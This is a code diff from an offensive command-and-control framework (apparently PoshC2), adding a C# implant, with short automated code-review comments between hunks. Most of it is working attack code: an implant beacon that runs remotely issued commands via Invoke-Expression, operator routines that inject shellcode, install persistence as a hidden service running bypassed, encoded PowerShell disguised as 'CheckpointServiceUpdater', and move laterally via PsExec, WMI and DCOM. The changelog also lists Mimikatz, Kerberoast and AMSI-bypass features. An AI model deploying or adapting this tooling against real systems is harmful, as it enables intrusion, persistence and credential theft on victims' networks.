$DeflateStream.Write($unencryptedBytes, 0, $unencryptedBytes.Length)
$DeflateStream.Dispose()
$bytes = $CompressedStream.ToArray()
@ -393,7 +400,7 @@ while($true)
if ($killdate -lt $date) {exit}
$sleeptimeran = $sleeptime, ($sleeptime * 1.1), ($sleeptime * 0.9)
$newsleep = $sleeptimeran|get-random
if ($newsleep -lt 1) {$newsleep = 5}
if ($newsleep -lt 1) {$newsleep = 5}
start-sleep $newsleep
$URLS = %s
$RandomURI = Get-Random $URLS
@ -441,7 +448,7 @@ while($true)
} elseif ($i.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $i -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$ModuleLoaded = Encrypt-String $key "ModuleLoaded"
$Output = Encrypt-String2 $key $Output
@ -452,7 +459,7 @@ while($true)
}
} else {
try {
$Output = Invoke-Expression $i | out-string
$Output = Invoke-Expression $i | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
@ -469,7 +476,7 @@ while($true)
(Get-Webclient -Cookie $Response).UploadData("$Server", $UploadBytes)|out-null
} catch{}
}
}
}
}
elseif ($ReadCommandClear.ToLower().StartsWith("upload-file")) {
try {
@ -494,7 +501,7 @@ while($true)
} elseif ($ReadCommandClear.ToLower().StartsWith("loadmodule")) {
try {
$modulename = $ReadCommandClear -replace "LoadModule",""
$Output = Invoke-Expression $modulename | out-string
$Output = Invoke-Expression $modulename | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$ModuleLoaded = Encrypt-String $key "ModuleLoaded"
$Output = Encrypt-String2 $key $Output
@ -506,7 +513,7 @@ while($true)
} else {
try {
$Output = Invoke-Expression $ReadCommandClear | out-string
$Output = Invoke-Expression $ReadCommandClear | out-string
$Output = $Output + "123456PS " + (Get-Location).Path + ">654321"
$StdError = ($error[0] | Out-String)
if ($StdError){
@ -528,7 +535,7 @@ while($true)
break
}
}""" % (self.Key, self.Sleep, self.AllBeaconImages, self.RandomURI, self.RandomURI, self.KillDate, self.AllBeaconURLs)
#Add all db elements
#Add all db elements
def display(self):
print Colours.GREEN,""
@ -551,7 +558,7 @@ while($true)
engine.say("Nice, we have an implant")
engine.runAndWait()
except Exception as e:
EspeakError = "espeak error"
EspeakError = "espeak error"
try:
apikey = select_item("APIKEY","C2Server")
@ -590,4 +597,4 @@ while($true)
if result:
autoruns = ""
for autorun in result:
new_task(autorun[1], self.RandomURI)
new_task(autorun[1], self.RandomURI)
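Review bot: The new `self.SharpCore` template is parsed on the implant side by the regexes in `primer()` in Files/Sharp.cs, which capture each field with `(.*)` and no `RegexOptions.Singleline`, so every `%s` value — in particular `self.AllBeaconURLs` and `self.AllBeaconImages` — must render on a single line or the capture is silently truncated; that coupling deserves a comment above the assignment, e.g. `# Marker names and single-line values must match the regexes in Files/Sharp.cs primer()`. The C# side then strips commas and splits the URL and image strings on quotes/whitespace, so the template presumably expects the same quoted-list formatting the PowerShell `$URLS = %s` line uses; worth confirming against `get_otherbeaconurls()`/`get_images()`, which are outside this hunk. The enclosing `__init__` starts before the hunk.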


@ -5,7 +5,7 @@ import datetime
from datetime import datetime, timedelta
from sqlite3 import Error
from Help import *
from AutoLoads import *
from AutoLoads import *
from DB import *
from Colours import *
from Config import *
@ -21,12 +21,12 @@ def createproxypayload():
proxyuser = raw_input("Proxy User: e.g. Domain\\user ")
proxypass = raw_input("Proxy Password: e.g. Password1 ")
proxyurl = raw_input("Proxy URL: .e.g. http://10.150.10.1:8080 ")
credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
credsexpire = raw_input("Password/Account Expiration Date: .e.g. 15/03/2018 ")
update_item("ProxyURL", "C2Server", proxyurl)
update_item("ProxyUser", "C2Server", proxyuser)
update_item("ProxyPass", "C2Server", proxypass)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
newPayload.CreateRaw("Proxy")
@ -46,14 +46,14 @@ def createdaisypayload():
daisyhost = get_implantbyid(daisyhostid)
proxynone = "if (!$proxyurl){$wc.Proxy = [System.Net.GlobalProxySelection]::GetEmptyWebProxy()}"
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
newPayload = Payloads(C2[5], C2[2], daisyurl, "", daisyport, "", "", "",
"", proxynone, C2[19], C2[20],
C2[21], "%s?d" % get_newimplanturl(), PayloadsDirectory)
newPayload.C2Core = (newPayload.C2Core).replace("$pid;%s" % (daisyurl+":"+daisyport),"$pid;%s@%s" % (daisyhost[11],daisyhost[3]))
newPayload.CreateRaw(name)
newPayload.CreateDlls(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateShellcode(name)
newPayload.CreateEXE(name)
newPayload.CreateMsbuild(name)
new_urldetails( name, C2[1], C2[3], domain, daisyurl, daisyhostid, "" )
startup("Created new %s daisy payloads" % name)
@ -78,7 +78,7 @@ def createnewpayload():
domainbase = "%s%s" % (randomid,domainbase)
imurl = get_newimplanturl()
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
newPayload = Payloads(C2[5], C2[2], domain, domainfront, C2[8], proxyuser,
proxypass, proxyurl, "", "", C2[19], C2[20],
C2[21], imurl, PayloadsDirectory)
newPayload.CreateRaw("%s_" % domainbase)
@ -92,11 +92,11 @@ def createnewpayload():
def argp(cmd):
args = ""
try:
try:
parser = argparse.ArgumentParser(add_help=False)
parser.add_argument('-Help', '-help', '-h', action='store', dest='help', required=False)
parser.add_argument('-Source', '-source', action='store', dest='source', required=True)
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
parser.add_argument('-Destination', '-destination', action='store', dest='destination', required=True)
parser.add_argument('-NotHidden', '-nothidden', action='store', dest='nothidden', required=False)
args, unknown = parser.parse_known_args(shlex.split(cmd))
except:
@ -118,7 +118,7 @@ def complete(text, state):
def load_file( location ):
fr = None
try:
file = open((location), "rb")
file = open((location), "rb")
fr = file.read()
except Exception as e:
print ("Error loading file %s" % e)
@ -142,12 +142,12 @@ def migrate(randomuri, params=""):
shellcodefile = load_file("%s/payloads/Posh-shellcode_x%s.bin" % (ROOTDIR,arch))
elif implant_comms == "Daisy":
daisyname = raw_input("Name required: ")
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
shellcodefile = load_file("%s/payloads/%sPosh-shellcode_x%s.bin" % (ROOTDIR,daisyname,arch))
elif implant_comms == "Proxy":
shellcodefile = load_file("%s/payloads/ProxyPosh-shellcode_x%s.bin" % (ROOTDIR,arch))
check_module_loaded("Inject-Shellcode.ps1", randomuri)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri)
def startup(printhelp = ""):
@ -302,16 +302,16 @@ def startup(printhelp = ""):
hostname = get_implantdetails(t[2])
if hostname[2] not in users:
users += "%s \n" % hostname[2]
if "Upload-File" in t[3]:
if "Upload-File" in t[3]:
uploadedfile = t[3]
uploadedfile = uploadedfile.partition("estination ")[2]
uploadedfile = uploadedfile.partition(" -Base64")[0]
uploads += "%s %s \n" % (hostname[3], uploadedfile)
uploads += "%s %s \n" % (hostname[3], uploadedfile)
if "Installing persistence" in t[4]:
hostname = get_implantdetails(t[2])
line = t[4].replace('\n','')
line = line.replace('\r','')
filenameuploaded = line.rstrip().split(":",1)[1]
filenameuploaded = line.rstrip().split(":",1)[1]
uploads += "%s %s \n" % (hostname[3], filenameuploaded)
startup("Users Compromised: \n%s\nHosts Compromised: \n%s\nURLs: \n%s\nFiles Uploaded: \n%s" % (users, hosts, urls, uploads))
if "listmodules" in implant_id.lower():
@ -380,7 +380,7 @@ def startup(printhelp = ""):
time.sleep(10)
startup()
def runcommand(command, randomuri):
def runcommand(command, randomuri):
if command:
try:
last = get_lastcommand()
@ -393,7 +393,7 @@ def runcommand(command, randomuri):
ExError = e
implant_type = get_implanttype(randomuri)
if implant_type == "OSX":
if implant_type == "OSX":
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
command = command.replace('set-beacon ', '')
command = command.replace('setbeacon ', '')
@ -450,7 +450,7 @@ def runcommand(command, randomuri):
new_task(uploadcommand, randomuri)
except Exception as e:
print ("Error with source file: %s" % e )
traceback.print_exc()
traceback.print_exc()
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (py_help1)
@ -484,13 +484,74 @@ def runcommand(command, randomuri):
kill_implant(randomuri)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
startup()
else:
if command:
new_task(command, randomuri)
return
elif implant_type == "C#":
if "searchhelp" in command.lower():
searchterm = (command.lower()).replace("searchhelp ","")
import string
helpfull = string.split(sharp_help1, '\n')
for line in helpfull:
if searchterm in line:
print (line)
elif "unhide-implant" in command.lower():
unhide_implant(randomuri)
elif "hide-implant" in command.lower():
kill_implant(randomuri)
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
if ri.lower() == "n":
print ("Implant not terminated")
if ri == "":
pid = get_pid(randomuri)
new_task("exit",randomuri)
kill_implant(randomuri)
if ri.lower() == "y":
pid = get_pid(randomuri)
new_task("exit" % pid,randomuri)
kill_implant(randomuri)
elif (command.lower() == "ps") or (command.lower() == "ps "):
check_module_loaded("Get-ProcessList.dll", randomuri)
new_task(command,randomuri)
elif "loadmoduleforce" in command.lower():
params = re.compile("loadmoduleforce ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri, force=True)
elif "loadmodule" in command.lower():
params = re.compile("loadmodule ", re.IGNORECASE)
params = params.sub("", command)
check_module_loaded(params, randomuri)
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
print (sharp_help1)
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
startup()
elif ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
new_task(command, randomuri)
command = command.replace('set-beacon ', '')
command = command.replace('setbeacon ', '')
command = command.replace('beacon ', '')
update_sleep(command, randomuri)
else:
if command:
new_task(command, randomuri)
return
else:
try:
check_module_loaded("Implant-Core.ps1", randomuri)
@ -522,24 +583,24 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, randomuri)
elif "install-servicelevel-persistence" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
new_task(cmd, randomuri)
elif "remove-servicelevel-persistence" in command.lower():
new_task("sc.exe delete CPUpdater", randomuri)
new_task("sc.exe delete CPUpdater", randomuri)
# psexec lateral movement
elif "get-implantworkingdirectory" in command.lower():
@ -550,7 +611,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -564,7 +625,7 @@ def runcommand(command, randomuri):
elif "get-system-withdaisy" in command.lower():
C2 = get_c2server_all()
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
cmd = "sc.exe create CPUpdaterMisc binpath= 'cmd /c %s' Displayname= CheckpointServiceModule start= auto" % payload
new_task(cmd, randomuri)
@ -575,7 +636,7 @@ def runcommand(command, randomuri):
elif "get-system" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -601,7 +662,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -613,7 +674,7 @@ def runcommand(command, randomuri):
elif "invoke-psexecdaisypayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri)
daisyname = raw_input("Payload name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-psexecdaisypayload ", re.IGNORECASE)
params = params.sub("", command)
@ -625,7 +686,7 @@ def runcommand(command, randomuri):
elif "invoke-psexecpayload" in command.lower():
check_module_loaded("Invoke-PsExec.ps1", randomuri)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -642,7 +703,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -654,7 +715,7 @@ def runcommand(command, randomuri):
elif "invoke-wmidaisypayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
params = re.compile("invoke-wmidaisypayload ", re.IGNORECASE)
params = params.sub("", command)
@ -666,7 +727,7 @@ def runcommand(command, randomuri):
elif "invoke-wmipayload" in command.lower():
check_module_loaded("Invoke-WMIExec.ps1", randomuri)
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -679,7 +740,7 @@ def runcommand(command, randomuri):
elif "invoke-dcomproxypayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -690,7 +751,7 @@ def runcommand(command, randomuri):
elif "invoke-dcomdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
p = re.compile(ur'(?<=-target.).*')
target = re.search(p, command).group()
@ -701,7 +762,7 @@ def runcommand(command, randomuri):
elif "invoke-dcompayload" in command.lower():
C2 = get_c2server_all()
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
"", "", "", "", C2[19], C2[20],
C2[21], get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -714,7 +775,7 @@ def runcommand(command, randomuri):
elif "invoke-runasdaisypayload" in command.lower():
daisyname = raw_input("Name required: ")
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
new_task("$proxypayload = \"%s\"" % payload, randomuri)
check_module_loaded("Invoke-RunAs.ps1", randomuri)
@ -732,7 +793,7 @@ def runcommand(command, randomuri):
if C2[11] == "":
startup("Need to run createproxypayload first")
else:
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], C2[12],
C2[13], C2[11], "", "", C2[19], C2[20],
C2[21], "%s?p" % get_newimplanturl(), PayloadsDirectory)
payload = newPayload.CreateRawBase()
@ -766,13 +827,13 @@ def runcommand(command, randomuri):
elif command.lower() == "help 4":
print (posh_help4)
elif command.lower() == "help 5":
print (posh_help5)
print (posh_help5)
elif command.lower() == "help 6":
print (posh_help6)
elif command.lower() == "help 7":
print (posh_help7)
elif command.lower() == "help 8":
print (posh_help8)
print (posh_help8)
elif "get-pid" in command.lower():
@ -796,11 +857,11 @@ def runcommand(command, randomuri):
if (args.nothidden):
uploadcommand = "Upload-File -Destination \"%s\" -NotHidden %s -Base64 %s" % (destination, args.nothidden, source)
else:
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
uploadcommand = "Upload-File -Destination \"%s\" -Base64 %s" % (destination, source)
new_task(uploadcommand, randomuri)
except Exception as e:
print ("Error with source file: %s" % e)
traceback.print_exc()
print ("Error with source file: %s" % e)
traceback.print_exc()
elif "kill-implant" in command.lower() or "exit" in command.lower():
impid = get_implantdetails(randomuri)
@ -855,15 +916,15 @@ def runcommand(command, randomuri):
shellcodefile = load_file(path)
if shellcodefile != None:
arch = "64"
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("$Shellcode%s=\"%s\"" % (arch,base64.b64encode(shellcodefile)), randomuri)
new_task("Inject-Shellcode -Shellcode ([System.Convert]::FromBase64String($Shellcode%s))%s" % (arch, params), randomuri)
except Exception as e:
print ("Error loading file: %s" % e)
elif "listmodules" in command.lower():
elif "listmodules" in command.lower():
print (os.listdir("%s/Modules/" % POSHDIR))
elif "modulesloaded" in command.lower():
elif "modulesloaded" in command.lower():
ml = get_implantdetails(randomuri)
print (ml[14])
@ -925,7 +986,12 @@ def commandloop(implant_id):
else:
hostname = get_hostdetails(implant_id)
if hostname[15] == 'OSX':
t.createListCompleter(UXCOMMANDS )
t.createListCompleter(UXCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
if hostname[15] == 'C#':
t.createListCompleter(SHARPCOMMANDS)
readline.set_completer_delims('\t')
readline.parse_and_bind("tab: complete")
readline.set_completer(t.listCompleter)
@ -956,7 +1022,7 @@ def commandloop(implant_id):
runcommand(command, implant_id)
except Exception as e:
print ("Unknown ImplantID")
# else run against single uri
# else run against single uri
else:
implant_id = get_randomuri(implant_id)
runcommand(command, implant_id)

0
Modules/Cred-Popper.ps1 Executable file → Normal file

2
Modules/Get-Hash.ps1 Executable file → Normal file


BIN
Modules/Get-ProcessList.dll Executable file



@ -1,22 +1,30 @@
function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
$expiration = $null
$certName = $null
$certPublicKeyString = $null
$certSerialNumber = $null
$certThumbprint = $null
$certEffectiveDate = $null
$certIssuer = $null
write-output "Checking $($url)"
$req = [Net.HttpWebRequest]::Create($url)
if ($proxyurl) {
$wc = New-Object System.Net.WebClient;
$wp = New-Object System.Net.WebProxy($proxyurl,$true)
$PSS = ConvertTo-SecureString $proxypass -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $proxyuser,$PSS;
$PSS = ConvertTo-SecureString $proxypass -AsPlainText -Force;
$getcreds = new-object system.management.automation.PSCredential $proxyuser,$PSS;
$wp.Credentials = $getcreds;
$req.Proxy=$wp;
}
$req.timeout = 10000
try {
$req.GetResponse() |Out-Null
} catch {
try {
$req.GetResponse() |Out-Null
} catch {
write-output "Exception while checking URL $($url)`: $($_)"
}
@ -30,4 +38,4 @@ function SSLInspectionCheck($url, $proxyurl, $proxyuser, $proxypass){
write-output "Cert for site $($url). Check details:`n`nCert name: $($certName)`nCert public key: $($certPublicKeyString)`nCert serial number: $($certSerialNumber)`nCert thumbprint: $($certThumbprint)`nCert effective date: $($certEffectiveDate)`nCert Expiry: $($expiration)`nCert issuer: $($certIssuer)"
rv req
}
}

BIN
Modules/Seatbelt.exe Executable file




@ -2,7 +2,7 @@
from Colours import *
from Core import *
import DB
import DB
def newTask(path):
result = DB.get_implants_all()
@ -26,7 +26,7 @@ def newTask(path):
print "Loading Shellcode",Colours.END
elif "upload-file" in command.lower():
print "Uploading File",Colours.END
else:
else:
try:
print command,Colours.END
except Exception as e:
@ -35,10 +35,16 @@ def newTask(path):
if a[2].startswith("loadmodule"):
try:
module_name = (a[2]).replace("loadmodule ","")
modulestr = load_module(module_name)
if ".exe" in module_name:
modulestr = load_module_sharp(module_name)
elif ".dll" in module_name:
modulestr = load_module_sharp(module_name)
else:
modulestr = load_module(module_name)
command = "loadmodule%s" % modulestr
except Exception as e:
print "Cannot find module, loadmodule is case sensitive!"
print e
if commands:
commands += "!d-3dion@LD!-d" + command
else:
@ -47,8 +53,6 @@ def newTask(path):
if commands is not None:
multicmd = "multicmd%s" % commands
try:
responseVal = encrypt(EncKey, multicmd)
except Exception as e:
@ -64,4 +68,4 @@ def newTask(path):
return default_response()
#else:
# return None
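Review bot: The new `.exe`/`.dll` dispatch in the loadmodule branch of newTask tests the extension as a substring of `module_name` (`if ".exe" in module_name:` / `elif ".dll" in module_name:`), so any name that merely contains `.exe` or `.dll` somewhere is routed to `load_module_sharp`, and both branches do the same thing. A single suffix check is clearer and tighter: `if module_name.lower().endswith((".exe", ".dll")):` followed by the existing `load_module_sharp` call, with the `elif` branch dropped and the `else` left as is. The name is taken verbatim from the queued task text, and whether `load_module_sharp` (defined elsewhere) keeps the lookup inside the Modules directory is not visible in this hunk, so that is worth confirming alongside the existing `load_module` path. newTask's body starts and continues outside the visible hunks.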


@ -1,5 +1,20 @@
4.6 (26/12/18)
==============
Added Sharp Implant and corresponding DLLs/Shellcode
4.5 (19/11/18)
==============
Removed Invoke-Enum
Merged Get-TokenElevationType.ps1 by jmhickman
Added TLS Config to Python Server
Updated README
Updated Get-IPAddress
Merged OfflineReportGenerator.py by skahwah
Updated to latest PowerUp.ps1
Updated INSTALL notes
Updated to work with FIPSAlgorithmPolicy
Updated to latest Invoke-Kerberoast & Invoke-Mimikatz
Removed process start for Netsh.exe on non migrate executable
4.4 (10/11/18)
==============
@ -11,7 +26,7 @@ Identify if SSL inspection is enabled for web traffic
Obtain a user hash using the methods from 'Internal-Monologue'
Updated to handle accents on hostnames or users
Updated Get-Processfull & Get-Processlist to handle errors on GetOwner()
Updated syntax error in WMIEvent module
Updated syntax error in WMIEvent module
Updated Shellcode/DLL to support scriptblock / transcript bypass
Updated default ps command - Now uses Get-ProcessList not Get-ProcessFull
Updated opsec command to add users compromised
@ -34,14 +49,14 @@ Added standalone msbuild.xml output format to payloads.py
Update Msbuild.xml to work with Windows10 64bit (replaced mem.copy to WriteProcessMemory)
Updated Inject-Shellcode to remove processpath and leave procpath
Added Get-ProcessList Module which uses winapi to do ps list (pinvoke - CreateToolhelp32Snapshot)
Added QueueUserAPC to Inject-Shellcode (migrate -Suspended -QueueUserAPC)
Merge pull request #6 from m0rv4i/update-script
Added QueueUserAPC to Inject-Shellcode (migrate -Suspended -QueueUserAPC)
Merge pull request #6 from m0rv4i/update-script
Updated Inject-Shellcode base directory to /proj/payloads
Updated output-to-html to Encode HTML Chars
Updated show-serverinfo
Added CSC output format to payloads.py
Added List-URLs Command to DB
Updated CredPopper puts default username and has minimum password limit
Updated CredPopper puts default username and has minimum password limit
Minor changes to documentation
4.2
@ -84,4 +99,4 @@ Updated to remove requirement for pycrypto for Python implants
Updated Brute-AD to Add Domain Flag
Updated Brute-AD Module
Updated to include AMSI Bypass
Updated PoshC2 to have the AMSI bypass by default in the Shellcode
Updated PoshC2 to have the AMSI bypass by default in the Shellcode